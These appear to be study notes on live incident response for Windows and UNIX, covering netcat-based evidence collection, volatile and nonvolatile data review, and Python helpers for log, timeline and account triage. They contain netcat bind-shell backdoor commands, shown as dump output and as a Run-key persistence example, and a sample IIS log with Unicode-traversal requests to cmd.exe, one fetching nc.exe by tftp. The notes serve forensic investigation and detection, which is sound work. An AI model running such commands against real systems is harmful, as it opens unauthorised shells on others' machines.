
Windows Live Response

Chapter 1
Live Incident Response Process
Start a netcat listener on the forensic workstation with the following
command:
nc -v -l -p 2222 > command.txt
On the victim computer you then run each command that collects live
response data and pipe its output across the network instead of
writing it to the victim's disk:
command | nc forensic_workstation_ip_address 2222
(forensic_workstation_ip_address is the IP address of the forensic
workstation.)
Calculate an MD5 checksum of command.txt right away so that you can
prove later that the file has not changed:
md5sum -b command.txt > command.md5
Always use the -b (binary mode) switch so the file is hashed byte for
byte. md5sum is available in the Cygwin utilities from www.cygwin.com.
Netcat sends everything in the clear. A variant of netcat named cryptcat
(http://sourceforge.net/projects/cryptcat) should be used instead
because it encrypts all of the data across the TCP channel; an intruder
sniffing the network will then not see what you are collecting.
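The collection channel described above, written out as an added example (it is not code from the book): the forensic-workstation side accepts one connection exactly as nc -v -l -p 2222 > command.txt does, the victim side pushes the command output, and the md5sum -b sidecar is written and later re-verified. Port 2222 and the file name command.txt come from the notes; the bind address, helper names and the idea of returning the victim's IP with the hash are assumptions.

```python
# Added example, not from the book: netcat-style collection listener plus
# the md5sum -b sidecar. Function names and the bind address are assumed.
import hashlib
import socket
from pathlib import Path


def receive_to_file(out_path, bind_addr="0.0.0.0", port=2222, on_listen=None):
    """Accept ONE connection, like `nc -v -l -p PORT > out_path`, stream the
    bytes into out_path and return what a responder records in the log:
    byte count, MD5 of the bytes as received and the victim's IP.
    on_listen(port) fires once the socket is bound (useful with port=0)."""
    digest = hashlib.md5()
    total = 0
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        if on_listen is not None:
            on_listen(srv.getsockname()[1])
        conn, (peer_ip, _peer_port) = srv.accept()
        with conn, open(out_path, "wb") as fh:
            while True:
                chunk = conn.recv(65536)
                if not chunk:          # victim closed the pipe: output complete
                    break
                fh.write(chunk)
                digest.update(chunk)
                total += len(chunk)
    return {"path": str(out_path), "bytes": total,
            "md5": digest.hexdigest(), "peer": peer_ip}


def send_output(data, host, port):
    """Victim side of `command | nc HOST PORT`: push the bytes, then close so
    the listener sees EOF (with a real nc listener you press Ctrl-C)."""
    with socket.create_connection((host, port)) as c:
        c.sendall(data)


def write_md5_sidecar(evidence):
    """Equivalent of `md5sum -b command.txt > command.md5`; the line format
    is '<hex digest> *<name>' (the asterisk marks binary mode)."""
    evidence = Path(evidence)
    digest = hashlib.md5(evidence.read_bytes()).hexdigest()
    evidence.with_suffix(".md5").write_text(f"{digest} *{evidence.name}\n")
    return digest


def verify_md5_sidecar(evidence):
    """Later check (what `md5sum -c` does): True only if the evidence file
    still hashes to the value recorded at collection time."""
    evidence = Path(evidence)
    recorded = evidence.with_suffix(".md5").read_text().split()[0]
    return hashlib.md5(evidence.read_bytes()).hexdigest() == recorded
```

Hashing while the bytes arrive means the recorded digest is the digest of what the victim sent, not of a file that may already have been touched on the workstation; the sidecar check afterwards catches any later modification.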

Analyzing Volatile Data


1) System Date and Time
The time and date are collected by issuing the date and time commands
at the prompt (use date /t and time /t so that each simply prints the
current value instead of prompting for a new one).
2) Current Network Connections
We view a machine's network connections by issuing the netstat
command. We specify the -an flags with netstat to retrieve all of the
network connections and the raw IP addresses instead of the Fully
Qualified Domain Names (FQDN):
netstat -an

Port 445: SMB file sharing (direct-hosted SMB; the NetBIOS session
service uses port 139)
Port 21: FTP
Port 3753: NattyServer (EVIL), a listener that does not belong on this
server


Use www.portsdb.org to find out what services normally run on a given
port.

Ports above 1024 are typically ephemeral (client-side) ports, so a
listener bound to one of them deserves a close look.
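The netstat -an review above, as an added example that is not part of the book: parse the raw listing, subtract a baseline of the listeners this server is supposed to have, flag anything left (and whether it sits in the ephemeral range), and pull out the remote IPs talking to a given port. The sample netstat output, the IP addresses and the baseline are constructed for the example.

```python
# Added example, not from the book: triage of `netstat -an` output.
# NETSTAT_AN_SAMPLE and EXPECTED_LISTENERS are constructed/assumed.
NETSTAT_AN_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3753           0.0.0.0:0              LISTENING
  TCP    192.0.2.10:139         192.0.2.20:1063        ESTABLISHED
  TCP    192.0.2.10:3753        198.51.100.7:1031      ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

# what an FTP/file server in this role is expected to listen on (assumption)
EXPECTED_LISTENERS = {("TCP", 21), ("TCP", 139), ("TCP", 445), ("UDP", 445)}


def parse_netstat(text):
    """Return one dict per socket line; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[:3]
        state = parts[3] if len(parts) > 3 else ""   # UDP lines carry no state
        lip, lport = local.rsplit(":", 1)
        fip, fport = foreign.rsplit(":", 1)
        rows.append({"proto": proto, "lip": lip, "lport": int(lport),
                     "fip": fip, "fport": fport, "state": state})
    return rows


def listeners(rows):
    """Ports something is bound to: LISTENING TCP sockets and every UDP socket."""
    return {(r["proto"], r["lport"]) for r in rows
            if r["proto"] == "UDP" or r["state"] == "LISTENING"}


def unexpected_listeners(rows, expected=EXPECTED_LISTENERS):
    """Listeners not in the baseline, each tagged with whether it sits in the
    range normally used only for ephemeral client ports (> 1024)."""
    return sorted((proto, port, port > 1024)
                  for proto, port in listeners(rows) - expected)


def peers_of(rows, port):
    """Remote IPs with an ESTABLISHED session to the given local port, i.e. the
    addresses to carry into nbtstat -c, the firewall logs and the IIS logs."""
    return sorted({r["fip"] for r in rows
                   if r["lport"] == port and r["state"] == "ESTABLISHED"})
```

The next step on the page, FPort, maps each flagged port to the executable that opened it; the parser only tells you which ports to ask FPort about.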
3) Open TCP or UDP Ports and 4) Executables Opening TCP or UDP Ports
Use FPort to link the open ports, and in particular the strange ones, to
the executables that opened them. FPort can be found at
www.foundstone.com.
Rename your netcat binary to t_NC.EXE; the t_ prefix marks it as your
trusted copy, so it is never confused with a netcat the attacker left on
the system.
5) Cached NetBIOS Name Tables
Windows (up until version 2003) stored connection specifics by NetBIOS
name rather than IP address. Because we want to map a NetBIOS name to
an IP address in order to track down the intruder, we issue the nbtstat
command during our live response to dump the victim system's NetBIOS
name cache. This shows only the current name table cache, not a
complete history of connections:
nbtstat -c
6) Users Currently Logged On
Run PsLoggedOn, a tool distributed within the PsTools suite from
www.sysinternals.com. It returns the users that are currently logged
onto the system, locally or through the resource shares.
For a user to be connected remotely, he or she must be connected to a
NetBIOS/SMB port; for Windows 2000 that is TCP port 445 or 139.
7) The Internal Routing Table
We examine the routing table by issuing the netstat command with the
-rn command-line switch:
netstat -rn
8) Running Processes
To learn which processes the attacker executed, use the pslist tool from
the PsTools suite distributed at www.sysinternals.com.

The first several lines are usually system processes, recognizable by
their lengthy elapsed running time: they have been running since
startup, which is typical of system processes.
PsExec is a tool distributed from www.sysinternals.com that enables a
valid user to connect from one Microsoft Windows machine to another
and execute a command over a NetBIOS connection. Attackers typically
use it to run cmd.exe. Seeing PsExec on the victim tells us three
things. First, PsExec only opens a channel if you supply proper
administrator-level credentials, so the attacker has an
administrator-level password. Second, because the attacker knows one
password, that password may also work on other machines in the
enterprise. Third, the attacker must be running a Microsoft Windows
system on the attacking machine to execute PsExec.
One of the first things attackers usually do when they gain access to a
system is to transfer their tools to the victim machine.
9) Running Services
We can easily obtain a list of services with the PsService executable
distributed in the PsTools suite. Run it without command-line arguments
to obtain the data we need.
10) Scheduled Jobs
Attackers with administrative access can schedule jobs. By typing at
we see any jobs that are scheduled to run.
11) Open Files
Use PsFile, also from the PsTools suite, to examine the list of files
opened remotely.
PsLoggedOn and PsFile both reveal the NetBIOS name of the computer that
is attacking. Once you seize the attacker's computer, search it for that
NetBIOS name as a keyword.
12) Process Memory Dumps
We need to capture the memory space of the suspect processes.
For details on the structure, organization, and management of memory on
these operating systems, we recommend the excellent reference Inside
Windows 2000, Third Edition, by David Solomon and Mark Russinovich.

Microsoft provides a utility called userdump.exe for the Windows NT
family of operating systems. This tool is a component of the Microsoft
OEM Support Tools package available at:
http://download.microsoft.com/download/win2000srv/Utility/3.0/NT45/EN-US/Oem3sr2.zip
userdump writes the extracted process memory to disk, so it cannot be
piped through a netcat session. Before you execute userdump, which would
otherwise write to the suspect system's hard drive, map a network share
to your forensic system:
C:\> net use Z: \\103.98.91.200\data
To execute userdump on a single suspect process, we supply it with the
process ID (PID) we obtained from the earlier pslist output and a
destination. To save the attacker's netcat process (PID 1424) to our
mapped drive Z:, we execute:
userdump 1424 Z:\nc_1424.dmp
Once you have the process memory dumps, perform an initial examination
with dumpchk.exe, a utility provided as a component of the Debugging
Tools for Windows, available at:
www.microsoft.com/whdc/ddk/debugging/default.mspx
Several of these utilities may require symbols from the Windows
operating system that was the source of the memory dump. These symbols
and information on their use are available at:
www.microsoft.com/whdc/ddk/debugging/symbols.mspx
Execute dumpchk to examine the suspected netcat process:
D:\> dumpchk nc_1424.dmp
Sample output:
CommandLine: nc -d -L -n -p 60906 -e cmd.exe
This output indicates that netcat was started detached from the console
(-d), listening on port 60906 (-p) and re-listening after each
connection (-L), without DNS lookups (-n), and executing a command shell
(-e cmd.exe) whenever a connection occurred.

Now examine the memory dumps for additional information by searching
the ASCII strings embedded within them. Because data stored in memory
by an application or process may be in Unicode (UTF-16) format, use a
Unicode-capable Windows version of the strings command. One is
available at www.sysinternals.com/ntw2k/source/misc.shtml; it displays
both Unicode and standard ASCII strings by default. The Linux strings
command does not display Unicode strings by default, so if you are
using Linux as a forensic processing platform, make sure you enable
that option (strings -e l selects 16-bit little-endian characters).
Run:
strings nc_1424.dmp
13) Full System Memory Dumps
Use the forensic build of dd available at:
http://users.erols.com/gmgarner/forensics
These utilities are based on the UnxUtils distribution, which can be
found at http://unxutils.sourceforge.net.
On UNIX systems you can read /dev/kmem, but Windows NT systems do not
provide a file object like that. Instead, dd opens the
\Device\PhysicalMemory section object. A section object, also called a
file-mapping object, represents a block of memory that two or more
processes can share. By mapping \Device\PhysicalMemory into its virtual
address space, dd can generate a dump representing system memory.
Use the following command line to capture system memory:

D:\> dd.exe if=\\.\PhysicalMemory of=z:\JBRWWW_full_memory_dump.dd bs=4096
To obtain an image of the entire physical hard drive from the live
system without requiring a shutdown, reboot or disruption of service,
use:
D:\> dd.exe if=\\.\PhysicalDrive0 of=z:\JBRWWW_physicaldrive0.dd bs=4096


Analyzing Nonvolatile Data


1) System Version and Patch Level
Knowing which patches have been applied to the server lets us narrow
our initial investigation to areas of high probability. PsInfo,
distributed in the PsTools suite at www.sysinternals.com, queries this
system information.
Run:
psinfo -h -s -d
(-h lists installed hotfixes, -s installed software and -d the disk
volumes.)
2) File System Time and Date Stamps
The standard dir command is usable, but there is something better. In
the UnxUtils package, available from unxutils.sourceforge.net, you will
find a command called find. If you are familiar with Cygwin you can
also use the find utility from that tool set.
Run:
find c:\ -printf "%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p\n"
The fields are mode, access date and time, modification date and time,
change date and time, numeric user and group, size in bytes and path.
The semicolon delimits each attribute so that the output can be
imported into a spreadsheet.
3) Registry Data
We can capture the complete registry in a rather cryptic format by
using RegDmp without command-line options. Of particular interest is
the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
with its three subkeys Run, RunOnce and RunOnceEx. Any value in Run
names a program that will be executed when the system starts up.
An attacker who wants a backdoor to survive a reboot can place the
following command in one of these keys; it opens a listening command
shell on port 10000 at every boot:
nc -d -L -p 10000 -e C:\winnt\system32\cmd.exe
4) The Auditing Policy
Windows NT and Windows 2000 do not have auditing turned on by default;
without it there are no security-related logs. The command to determine
the auditing policy is auditpol, distributed with Microsoft's resource
kits.
5) A History of Logins
A history of logins can be obtained with the NTLast command,
distributed by www.foundstone.com. NTLast is run without command-line
arguments to get all of the login information. It reads the Security
event log, so it shows nothing unless logon auditing was enabled
beforehand.
6) System Event Logs
There are typically three event logs on a Windows machine:
- Security
- Application
- System
The command PsLogList from the PsTools suite distributed at
www.sysinternals.com extracts these logs into an easy to read format.
Run:
psloglist -s -x security

The -s switch tells psloglist to dump each event on a single line. The
-x switch tells psloglist to dump the extended information for each
event.
7) User Accounts
Use pwdump, which dumps the local user accounts together with their
password hashes from the SAM.
8) IIS Logs
"You cannot block what you must allow in."
The IIS Web server writes all activity to logs in the
C:\winnt\system32\logfiles directory by default. To see what is in the
logs, type them out across the netcat channel.
First, execute this on the forensic workstation:
nc -v -l -p 2222 > ex030923.log
Then type the following command on the victim to transfer the file
ex030923.log to the forensic workstation:
type c:\winnt\system32\logfiles\w3svc1\ex030923.log | nc forensic_workstation_ip_address 2222
Press CTRL-C when the file has finished transferring. Note that the
times in IIS logs are GMT, not local time (EDT in this case). Only the
default fields are recorded unless the administrator enables more. A
good reference for these fields exists at:
www.microsoft.com/technet/prodtechnol/windowsserver2003/proddocs/standard/ref_we_logging.asp
Nikto is a well-known Web server vulnerability scanning tool available
from www.cirt.net/code/nikto.shtml. Web vulnerability scanners generate
numerous result codes in the 400s, because most of the files they probe
for do not exist. Other result codes can be compared to the chart at
http://www.iisfaq.com/default.aspx?View=A145&P=230.

A successful attack against a vulnerable server can crash the Web
server before the request is written out, so the decisive request may
be missing from the IIS log. Conversely, any request that reaches
cmd.exe is an incident on its own: the Web server should never access
the command shell.
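The three checks just described, as an added example that is not code from the book: read a W3C extended IIS log using its #Fields header, count 4xx results per client to spot a Nikto-style scanner, catch requests that reach cmd.exe even when they are URL-encoded, double-encoded or hidden behind the Unicode directory traversal, and shift the GMT timestamps to local time. The log lines and IP addresses are constructed; the field list is a subset of the default IIS fields, and the threshold of five errors is an assumption.

```python
# Added example, not from the book: IIS W3C extended log triage.
# IIS_LOG_SAMPLE is constructed; min_errors=5 is an assumed threshold.
from collections import Counter
from datetime import datetime, timedelta
from urllib.parse import unquote

IIS_LOG_SAMPLE = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-09-23 20:13:55
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-09-23 20:13:55 192.0.2.20 GET /default.htm - 200 Mozilla/4.0
2003-09-23 20:14:01 198.51.100.7 GET /cgi-bin/ - 404 Mozilla/4.75
2003-09-23 20:14:01 198.51.100.7 GET /scripts/ - 403 Mozilla/4.75
2003-09-23 20:14:02 198.51.100.7 GET /_vti_bin/shtml.exe - 404 Mozilla/4.75
2003-09-23 20:14:02 198.51.100.7 GET /iisadmpwd/aexp.htr - 404 Mozilla/4.75
2003-09-23 20:14:03 198.51.100.7 GET /msadc/msadcs.dll - 404 Mozilla/4.75
2003-09-23 20:14:03 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 Mozilla/4.75
2003-09-23 20:14:09 198.51.100.7 GET /scripts/..%255c../winnt/system32/%63md.exe /c+tftp+-i+198.51.100.7+GET+nc.exe 200 Mozilla/4.75
"""


def parse_iis_log(text):
    """Map each data line onto the column names given by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def normalize_uri(uri):
    """Decode twice (catches %25 double encoding), then treat the undecodable
    overlong UTF-8 bytes of the IIS Unicode traversal and backslashes as '/'."""
    decoded = unquote(unquote(uri))
    for seq in ("\ufffd", "\\"):
        decoded = decoded.replace(seq, "/")
    return decoded.lower()


def shell_requests(rows):
    """Requests that reached (or tried to reach) the command shell."""
    hits = []
    for r in rows:
        target = normalize_uri(r["cs-uri-stem"]) + " " + normalize_uri(r["cs-uri-query"])
        if "cmd.exe" in target:
            hits.append({"ip": r["c-ip"], "uri": target, "status": r["sc-status"],
                         "traversal": "../" in target})
    return hits


def scanner_candidates(rows, min_errors=5):
    """Client IPs with at least min_errors 4xx responses: the signature of
    Nikto-style scanners probing for files that are not there."""
    errors = Counter(r["c-ip"] for r in rows if r["sc-status"].startswith("4"))
    return sorted(ip for ip, n in errors.items() if n >= min_errors)


def local_time(row, utc_offset_hours):
    """IIS logs in GMT; convert for correlation with local evidence (EDT = -4)."""
    stamp = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
    return stamp + timedelta(hours=utc_offset_hours)
```

In the sample the scanner's burst of 404s is followed seconds later by two successful (200) cmd.exe requests, the second of which uses tftp to pull nc.exe onto the server, which is exactly the tool transfer the Windows chapter warns about.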
9) Suspicious Files
To transfer any suspicious file, run the following on the forensic
workstation:
nc -v -l -p 2222 > filename
Then, on the victim, transfer the file named filename by using type:
type filename | nc forensic_workstation_ip_address 2222
Putting It All Together
See the SANS reading room paper on the IIS Unicode vulnerability:
http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458

UNIX Live Response


Chapter 2
On the forensic workstation, run:
nc -v -l -p 10000 > command.txt
On the victim computer, run:
command | nc forensic_workstation_ip_address 10000
Remember to press CTRL-C to break the netcat session once the output
has arrived.
Then hash the collected file:
md5sum -b command.txt > command.md5
1) System Date and Time
Run:
date
2) Current Network Connections
Run:
netstat -an

Port 515 is the port on which the printer daemon (lpd) typically
listens. A quick search on www.securityfocus.com for Red Hat 7.0 and
lpd shows that the lpd shipped with that release has known remotely
exploitable vulnerabilities, so an exposed port 515 is a likely entry
point.
3) Open TCP or UDP Ports
Run the following to see the process number that opened each port. The
-p switch only works on Linux and will not work on other flavors of
UNIX:
netstat -anp
The UNIX counterpart of FPort is lsof, List Open Files; lsof is the
single most powerful tool in the live response toolkit for UNIX
systems.
Run (add -i to restrict the listing to network sockets):
lsof -n

A good source on loaded kernel modules is the book Malware: Fighting
Malicious Code by Ed Skoudis.
4) Running Processes
Run the following to list all the running processes on the system and
the users running them:
ps aux
5) Open Files
Run:
lsof
6) The Internal Routing Table
Run:
netstat -rn
7) Loaded Kernel Modules
Run:
lsmod
8) Mounted File Systems
Run:
mount or df

Analyzing Nonvolatile Data


1) System Version and Patch Level
Run the following to get all available operating system version
information:
uname -a
Run the following to list every installed package with its version
number (on RPM-based systems):
rpm -qa

2) File System Time and Date Stamps
Run (the same format string as on Windows, starting at the root
directory):
find / -printf "%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p\n"
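The find -printf listing above (and the identical one in the Windows chapter) is meant to go into a spreadsheet; the following added example, which is not code from the book, does that step in code instead: it parses the semicolon-delimited lines back into typed fields, orders them into a modification-time timeline, lists what changed after a given moment, and pulls out setuid-root files. The sample lines are constructed; the field order is exactly the notes' format string %m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p, and the date layout assumes the mm/dd/yy and HH:MM:SS.fraction forms GNU find prints for %Ax and %AT.

```python
# Added example, not from the book: timeline from `find -printf` output.
# FIND_SAMPLE is constructed; helper names are assumed.
from datetime import datetime

FIND_SAMPLE = """\
644;09/23/03;14:05:12.0000000000;05/30/01;11:22:33.0000000000;05/30/01;11:22:33.0000000000;0;0;1234;/etc/hosts
4755;09/23/03;20:03:41.0000000000;09/23/03;20:03:41.0000000000;09/23/03;20:03:41.0000000000;0;0;59392;/tmp/.kde/nc
4755;09/23/03;09:00:00.0000000000;03/10/01;08:30:00.0000000000;03/10/01;08:30:00.0000000000;0;0;35168;/bin/su
644;09/23/03;20:04:02.0000000000;09/23/03;20:04:02.0000000000;09/23/03;20:04:02.0000000000;0;0;12;/tmp/a;b
"""


def _stamp(date_s, time_s):
    # %Ax/%Tx/%Cx give mm/dd/yy; %AT/%TT/%CT give HH:MM:SS plus a fraction
    return datetime.strptime(f"{date_s} {time_s.split('.')[0]}", "%m/%d/%y %H:%M:%S")


def parse_find_line(line):
    # %p is last, so split at most 10 times: a ';' inside a path stays intact
    mode, ax, at, tx, tt, cx, ct, uid, gid, size, path = line.split(";", 10)
    return {"mode": int(mode, 8), "atime": _stamp(ax, at), "mtime": _stamp(tx, tt),
            "ctime": _stamp(cx, ct), "uid": int(uid), "gid": int(gid),
            "size": int(size), "path": path}


def load_timeline(text):
    """Entries ordered by modification time, oldest first."""
    entries = [parse_find_line(l) for l in text.splitlines() if l.strip()]
    return sorted(entries, key=lambda e: e["mtime"])


def changed_since(entries, when):
    """Paths whose content (mtime) or metadata (ctime) changed at or after
    `when`. An attacker can reset mtime with touch; ctime is harder to fake,
    which is why both are checked and atime is ignored."""
    return [e["path"] for e in entries if e["mtime"] >= when or e["ctime"] >= when]


def setuid_root(entries):
    """Files owned by uid 0 with the setuid bit (04000) set; compare against a
    clean install, because a new entry here is a classic backdoor."""
    return [e["path"] for e in entries if e["uid"] == 0 and e["mode"] & 0o4000]
```

Splitting on at most ten semicolons is what keeps a path such as /tmp/a;b from corrupting the remaining columns, something a naive spreadsheet import would silently get wrong.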
3) File System MD5 Checksum Values
Databases of known hashes of known system files are available at
www.hashkeeper.org; comparing against them lets you set aside the
standard files and concentrate on the rest.
To calculate the MD5 checksum for every regular file on the root file
system, without crossing into other mounted file systems, run:
find / -type f -xdev -exec md5sum -b {} \;
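What you do with that listing, as an added example that is not code from the book: hash a tree the same way (regular files only, staying on one file system like -xdev), read back a listing produced by md5sum -b, diff the current state against an earlier baseline into modified/added/missing, and subtract a known-good hash set such as HashKeeper to leave only the files that still need a look. The directory layout, baseline and known-hash set are assumptions made up for the example.

```python
# Added example, not from the book: MD5 inventory and comparison.
# Helper names, the baseline and the "known good" set are assumed.
import hashlib
import os


def hash_tree(root):
    """{relative path: md5} for regular files under root, staying on one
    file system (-xdev) and skipping symlinks, as `find -type f -xdev` does."""
    result = {}
    root_dev = os.stat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        # prune mount points so /proc, /dev/shm, NFS etc. are not hashed
        dirnames[:] = [d for d in dirnames
                       if os.lstat(os.path.join(dirpath, d)).st_dev == root_dev]
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            digest = hashlib.md5()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 20), b""):
                    digest.update(chunk)
            result[os.path.relpath(full, root)] = digest.hexdigest()
    return result


def parse_md5sum_output(text):
    """Read lines produced by `md5sum -b` ('<hex> *<path>') into a dict."""
    out = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, path = line.split(maxsplit=1)
        out[path.lstrip("*")] = digest
    return out


def compare(baseline, current):
    """Three lists an investigator acts on: modified, added, missing."""
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def not_in_known_set(current, known_hashes):
    """Files whose hash is absent from a known-good set: the ones left to
    examine by hand after the reference database eliminated the rest."""
    return sorted(p for p, h in current.items() if h not in known_hashes)
```

A trojaned ps shows up as "modified" against a baseline but, more usefully, also fails the known-good lookup even when no baseline of this particular machine exists.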
4) Users Currently Logged On
Users who are currently logged on are recorded in /var/run/utmp.
Run:
w
Attackers who want to seriously hamper your investigation can wipe
their entries from these records with log cleaners such as zap2,
publicly available from www.packetstormsecurity.com.
5) A History of Logins
A history of logins is saved in the binary log /var/log/wtmp.
Run:
last
Datapipe is a utility that listens on one port and forwards the
traffic to another port on another machine.
6) Syslog Logs
The syslog daemon listens for messages from local programs or from
other hosts on the network and logs them according to the
/etc/syslog.conf configuration file.
The two logs most relevant to an investigation are /var/log/messages
and /var/log/secure. Each line carries a timestamp, the hostname, the
logging program (usually with its PID) and then the message text.
When buffer overflows occur, they break valid programs, and broken
programs typically leave garbage, such as runs of unprintable bytes, in
the log.

7) User Accounts
Examine /etc/passwd to see whether the intruder has added any rogue
user accounts. A rogue account often has a home directory of / and,
more importantly, a user ID of zero.
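The /etc/passwd review above, as an added example that is not code from the book: parse the file and flag the two signs the notes name (a second uid 0 account and a home directory of /), plus a low-uid service account that has been given an interactive shell, which is a common way to hide a login. The passwd contents below are constructed; the uid 500 boundary for "system" accounts follows the Red Hat convention of the time and is an assumption.

```python
# Added example, not from the book: rogue-account checks on /etc/passwd.
# PASSWD_SAMPLE is constructed; the uid < 500 cutoff is assumed.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
jbr:x:500:500:JBR:/home/jbr:/bin/bash
toor:x:0:0::/:/bin/sh
adm2:x:501:501:backup op:/:/bin/sh
"""

NOLOGIN_SHELLS = ("/sbin/nologin", "/usr/sbin/nologin", "/bin/false")


def parse_passwd(text):
    """One dict per account; the seven colon-separated passwd fields."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def rogue_accounts(entries, system_uid_max=500):
    """Return {account name: [reasons]} for every account that trips a check."""
    findings = {}
    for e in entries:
        reasons = []
        if e["uid"] == 0 and e["name"] != "root":
            reasons.append("uid 0 but not root")
        if e["home"] == "/":
            reasons.append("home directory is /")
        if (e["uid"] < system_uid_max and e["name"] != "root"
                and e["shell"] not in NOLOGIN_SHELLS):
            reasons.append("system account with interactive shell")
        if reasons:
            findings[e["name"]] = reasons
    return findings
```

Run against the real file the same way (open("/etc/passwd").read()); on a live response it is the copy you shipped over netcat, not the victim's file, that you parse.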
8) User History Files
Look in each user's ~/.bash_history for commands the intruder ran,
including ones that failed. For example, ps auxw | grep datapipe shows
the intruder looking for the keyword datapipe.
9) Suspicious Files
Transfer any suspicious files with netcat. On the forensic workstation,
run:
nc -v -l -p 10000 > filename
Then, on the victim, transfer the file named filename to the forensic
workstation:
cat filename | nc forensic_workstation_ip_address 10000

By entering the /proc directory you can see references to running
processes and other system information. You see directories named
after integers, such as 1348, one per process ID. There is another
important directory within /proc/1348, called fd, which holds one
entry per file descriptor the process has open.

Chapter 3
Network-Based Evidence (NBE)
(To be continued.)
When most people consider network-based evidence, thoughts of firing
up Tcpdump or Wireshark come to mind.
Investigators collect four types of NBE:
- Full content data
- Session data
- Alert data
- Statistical data